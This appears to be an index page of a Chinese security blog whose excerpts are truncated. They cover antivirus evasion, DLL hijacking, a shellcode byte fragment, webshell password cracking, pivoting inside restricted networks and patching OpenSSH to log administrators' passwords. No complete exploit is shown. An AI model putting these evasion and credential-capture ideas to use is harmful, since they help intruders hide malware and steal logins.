杀死比特

Form1 private void button1_Click(object sender, EventArgs e) { Form f = new Form2(ref listView1); f.Activate(); f.Show(); } Form2 ...

#coding=utf-8 # # Dll Hijacker # # platform: Python 2.x @ Windows # # author:Coca1ne import os,sys,time import pefile def main(): try: pe = pefile.PE(sys.argv[1]) exportTable ...

以前刚开始学网络安全，是从免杀开始的。记得那时候杀毒软件还很弱。金山江民瑞星还存在。 那会什么原理也不懂，就一直瞎鼓捣。（后来转入渗透行列了） 这段时间一直在学PE格式，突然想起来以前很古老的PE文件头移位。 网上搜了搜，看大家虽然做了视频，但是竟然没人讲原理。借着刚好在学PE格式的知识，就做个PE

#include "stdafx.h" #include #include char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" "\x78...

详细参数说明： 当把shellcode写入代码shellcode变量的时候，输入-bin shellcode.bin 将生成二进制文件数据流。 当需要把二进制数据流转换成hex(16进制的时候)输入-hex shellcode.bin hex.hex 具体请看代码。这是博主自己的学习笔记，请勿喷。

http://www.cnblogs.com/killbit/p/5393301.html 附上这篇文章，因为当时就已经想到了模拟上传，但是因为时间关系，所以就直接用PHP写了。现在改进一下，用VC+libcurl库。 我们也直接可以用MYSQL写入这段上传代码就可以了。 upload.html u

前几天和哥们做一次渗透测试，内网情况、防护相当严格。 内网不允许访问DMZ，DMZ不允许访问内网，除了服务端口，比如80，3306. 经过长时间的分析，就发现本机连接了内网的一个MYQL，发现WEB开启了PHPMYADMIN，于是模拟发包拿到了一个shell。 通过CURL来传递命令，发现即使对方是

loader(exe): dll：Loaddll 添加一个.def模块定义文件。

在渗透当中，经常会碰到这样的问题。一个机器，机器上好几个用户，或者域内，想让某个机器的某个会话执行你想要执行的程序，或者中马，以当前会话来上线。 现在模拟如下的一个情况： 严格的DMZ，内网-->Dmz,而dmz->X<-内网. 而DMZ的服务器上有好几个会话，我们可以通过模拟用户登录来创建进程，看

之前我在论坛发过了一句话的破解工具。所以决定还是在基础上在改改，符合某些人的利用。上一版只支持HTTPS/ASPX，这次改进后，也算是最后一版。支持：PHP/HTTP/HTTPSASPX/HTTP/HTTPS缺点：界面用了线程，而网络这块没有用多线程。（这个我是根据自己的需要写的，自己并不需要）这个...

真正做到PASS 360，启动项什么的。我觉得还是有可能的把？虽然它就是一个流氓，但是我们要想办法比它更流氓。只是有一个点：那就是行为监控，那既然行为监控（云分析抛开）。那就找一个可信任的程序来调用呗。所以我萌生以下几种思路：1：找大厂商的软件，来进行DLL劫持。2：直接以shellcode的方式来...

在一些渗透当中，我们需要批量探针出口来达到我们的目的。所以就有了这个丑陋简洁的小脚本。#!/usr/bin/env python#-*- coding:utf-8 -*-import sysimport threadingimport httplibimport reimport timeclass...

Shell是怎么拿下的我们就不纠结了。我们来上传菜刀一句话，来仔细分析分析。先来看看内网环境把。很高兴的是现在管理员在线。可以抓去文明密码。但是很悲催的又是。服务器不支持走TCP协议。HTTP协议不能走。估计可能是数据不能往外走。来看下环境把：看把，ICMP包都封了。如此以来几个判断就如下了：1：系...

在学习界面设计，因为对一些控件不熟悉，所以也参考了别人的。核心代码如下。void CTasklistDlg::Expand(){ m_list.SetExtendedStyle(LVS_EX_GRIDLINES | LVS_EX_FULLROWSELECT); m_list.Insert...

最近想设计一款WEBSHELL的综合破解工具。然后设计到了日志输出那儿，因为MFC不熟悉，刚学。所以一直在想用edit控件好还是clist比较好。今天设计了一下日志输出界面，然后记录一下学习笔记。void CshellDlg::panted(){ m_list.SetExtendedStyle...

学习记录：两个类，一个为主类1个为：CCkDlg,主类1个为:Https,用来做HTTPS请求获得页面状态。测试界面如下：CCkDlg 类里定义函数void CCkDlg::printf_r(CString str) //用于输出日志信息{ m_log.SetSel(-1,-1); m_log....

个人在做Linux渗透测试往内网跨的时候，通常我碰到的Linux环境都会是如下集中情况1： DMZ，严格的DMZ，根本跨不到内网里去。这种最恶心了。2：WEB SERVER，严格区分，工作机和工作机放一块儿，WEB SERVR和SERVER放一块儿。 内网可以直接访问过来，而WEBSERVER却无法...

#!/usr/bin/env python#-*- coding:utf-8 -*-import sysimport threadingimport urllibimport httplibclass Mythread(threading.Thread): def __init__(s...

大家都知道，OPENSSH是基于Linux下，一款开源，安全性不错的Linux SSH会话连接工具。在渗透当中，当我们get root了。我们如何来记录Linux管理员登陆过的SSH？想法如下：1：更改OPENSSH源代码，记录到某个地方。2：在更改源代码的前提下，将OPENSSH 记录到的账户密码...

---恢复内容开始---#!/usr/bin/env python#-*- coding:utf-8 -*-import smtplibimport sysimport timeimport threadingclass Mythread(threading.Thread): def __in...